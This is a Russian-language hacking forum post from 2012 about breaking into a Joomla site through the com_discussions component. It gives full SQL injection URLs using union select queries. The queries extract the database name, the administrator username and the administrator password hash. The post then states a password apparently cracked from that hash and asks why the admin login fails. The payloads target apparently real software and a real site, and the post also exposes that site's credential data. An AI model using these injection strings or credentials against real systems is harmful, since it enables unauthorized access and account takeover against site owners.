com_discussions Joomla

20.06.2012, 15:01

Cmexo3aBp

Новичок

Регистрация: 26.01.2012

Сообщений: 4

С нами: 7523606

Репутация: 0

Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.

Есть пациент:

Цитата:

Сообщение от None

index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1

НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:

Цитата:

Сообщение от None

index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20c oncat(0x7e,0x27,unhex(Hex(cast(database()%20as%20c har))),0x27,0x7e)--+a

Узнаю что название базы данных - ipenza_giperion

Далее вытаскиваем логин администратора следующим образом:

Цитата:

Сообщение от None

index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .username%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a

Узнаю что он у нас оказывается: Trav

Далее вытаскиваем пасс ( он вроде как должен быть в хэше)

Цитата:

Сообщение от None

/index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .password%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a#

Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM

После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...

Итак что имеем:

Логин Администратора: Trav

Пароль Администратора: 489341282

Заходим в http:///administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....

Вот где я ошибся ?

𝕏 Twitter Reddit Telegram Копировать ссылку